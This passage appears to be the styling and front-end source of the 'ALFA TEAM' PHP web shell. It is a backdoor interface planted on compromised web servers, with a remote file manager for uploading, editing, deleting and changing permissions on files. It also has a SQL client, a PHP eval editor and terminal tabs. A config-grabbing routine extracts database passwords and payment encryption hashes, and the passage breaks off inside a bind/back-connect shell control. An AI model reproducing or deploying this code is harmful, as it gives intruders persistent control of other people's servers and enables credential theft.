img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
1055<?php echo '
1056@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1057@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1058@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
1059@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
1060#alfaloader{'.$csscode.'width:100px;height:100px;}
1061#a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
1062.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
1063.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}'.alfaCssLoadColors().'
1064</style>';
1065echo "<script type='text/javascript'>
1066var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
1067var a_ = '" . htmlspecialchars(@$_POST['a']) ."';
1068var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
1069var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
1070var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";";?>
1071var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&path="+c_+"&file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"¤t_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press 